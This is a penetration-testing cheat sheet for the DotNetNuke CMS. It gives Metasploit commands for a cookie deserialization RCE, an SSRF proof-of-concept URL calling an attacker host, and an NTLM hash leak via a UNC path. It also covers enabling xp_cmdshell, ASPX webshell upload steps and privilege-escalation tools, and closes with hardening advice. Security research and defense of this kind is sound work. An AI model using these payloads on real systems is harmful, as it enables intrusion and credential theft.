# DotNetNuke (DNN)

{{#include ../../banners/hacktricks-training.md}}

## DotNetNuke (DNN)

If you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years.  The following cheat-sheet collects the most useful primitives for both offensive and defensive work.

---
## Version & Environment Enumeration

* Check the *X-DNN* HTTP response header – it usually discloses the exact platform version.
* The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs).
* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` for low-privilege users.
* Typical cookies you will see on a live instance:
  * `.DOTNETNUKE` – ASP.NET forms authentication ticket.
  * `DNNPersonalization` – contains XML/serialized user profile data (old versions – see RCE below).

---
## Unauthenticated Exploitation

### 1. Cookie Deserialization RCE  (CVE-2017-9822 & follow-ups)
*Affected versions ≤ 9.3.0-RC*

`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled.  Crafted XML can therefore lead to arbitrary gadget chains and code execution.

```
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run
```
The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326).  Exploitation works **without authentication** on 7.x–9.1.x and with a *verified* low-privilege account on 9.2.x+.

### 2. Server-Side Request Forgery  (CVE-2025-32372)
*Affected versions < 9.13.8  –  Patch released April 2025*

A bypass of the older `DnnImageHandler` fix enables an attacker to coerce the server to issue **arbitrary GET requests** (semi-blind SSRF).  Practical impacts:

* Internal port scan / metadata service discovery in cloud deployments.
* Reach hosts otherwise firewalled from the Internet.

Proof-of-concept (replace `TARGET` & `ATTACKER`):
```
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
```
The request is triggered in the background; monitor your listener for callbacks.

### 3. NTLM Hash Exposure via UNC Redirect  (CVE-2025-52488)
*Affected versions 6.0.0 – 9.x (< 10.0.1)*

Specially crafted content can make DNN attempt to fetch a resource using a **UNC path** such as `\\attacker\share\img.png`.  Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker.  Upgrade to **10.0.1** or disable outbound SMB at the firewall.

### 4. IP Filter Bypass  (CVE-2025-52487)
If administrators rely on *Host/IP Filters* for admin portal protection, be aware that versions prior to **10.0.1** can be bypassed by manipulating `X-Forwarded-For` in a reverse-proxy scenario.

---
## Post-Authentication to RCE

### Via SQL console
Under **`Settings → SQL`** a built-in query window allows execution against the site database.  On Microsoft SQL Server you can enable **`xp_cmdshell`** and spawn commands:

```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
```

### Via ASPX webshell upload
1. Go to **`Settings → Security → More → More Security Settings`**.
2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**.
3. Browse to **`/admin/file-management`** and upload `shell.aspx`.
4. Trigger it at **`/Portals/0/shell.aspx`**.

---
## Privilege Escalation on Windows
Once code execution is achieved as **IIS AppPool\<Site>**, common Windows privilege-escalation techniques apply.  If the box is vulnerable you can leverage:

* **PrintSpoofer** / **SpoolFool** to abuse *SeImpersonatePrivilege*.
* **Juicy/Sharp Potatoes** to escape *Service Accounts*.

---
## Hardening Recommendations (Blue Team)

* **Upgrade** to at least **9.13.9** (fixes SSRF bypass) or preferably **10.0.1** (IP filter & NTLM issues).
* Remove residual **`InstallWizard.aspx*`** files after installation.
* Disable outbound SMB (ports 445/139) egress.
* Enforce strong *Host Filters* on the edge proxy rather than within DNN.
* Block access to `/API/RemoteContentProxy` if unused.



## References

* Metasploit `dnn_cookie_deserialization_rce` module documentation – practical unauthenticated RCE details (GitHub).
* GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & patch information.
{{#include ../../banners/hacktricks-training.md}}